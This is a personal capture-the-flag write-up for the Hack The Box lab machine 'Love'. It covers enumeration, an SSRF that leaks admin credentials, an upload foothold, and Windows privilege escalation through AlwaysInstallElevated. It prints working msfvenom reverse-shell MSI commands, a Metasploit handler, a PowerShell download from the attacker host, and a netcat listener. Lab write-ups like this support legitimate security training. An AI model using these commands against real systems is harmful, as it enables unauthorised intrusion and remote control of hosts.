IP: ## 10.10.10.239
echo "10.129.128.17 love.htb" >> /etc/hosts
nmap
|Port|service| |—|—| |80|http| |135|msrpc| |139|netbios-ssn| |443|https| |445|smb| |3306|mysql| |5000|upnp|
Lets start with the website. we can see it a voting website using php. like try do some enumlation on the site.
gobuster dir -u http://love.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
We find /admin which ask for creds we do not have yet.
lets try the other ports on port 443 we get access forbidden.
looking at the cert of the https site we see a subdomain
staging.love.htb and username roy@love.htb.
So we add the the domin to /etc/hosts.
I try with https but still got forbidden, but on http we get a file scanner.
Lets see if we can
I tried scanning itself just for fun as it was forbidden to us.
http://127.0.0.1:5000
creds: Vote Admin Creds admin: @LoveIsInTheAir!!!!
Let try login with the cred on love.htb/admin and we got access. I can see under user setting we have a the options to upload a file as our images, lets see if it can be exploited. At the buttom we see it created by sourcecodester.com and the system is called voting-system-using-php.html time to google for exploit.
https://www.exploit-db.com/exploits/49445 But sadly the exploit did not work :C Guess we have to do it the manual way.
I tried my go to reverse shell by pentestmonkey, but did not work I got hinted at using: shell
we got access as user, get the flag and lets try get admin
admin
Scan the system with WinPEAS and we learn that AlwaysInstalledElevated feature is used to install MSI packages, lets create a shell with msfvenom and get admin.
msfvenom -p windows/x64/meterpreter/reverse\_tcp LHOST=10.10.14.200 LPORT=8856 -f msi -o "trustme.msi"
Now open msfconsole to catch the rev shell.
msfconsole -q
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 10.10.14.200
set lport 8765
Upgrade to powershell and download the file
Powershell.exe
Invoke-WebRequest -URI http://10.10.14.200:8000/trustme.msi -OutFile trustme.msi
and still just user.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.200 LPORT=8856 -f msi -o "trustme.msi"
On another machine.
nc -lvnp 8856
and I got root.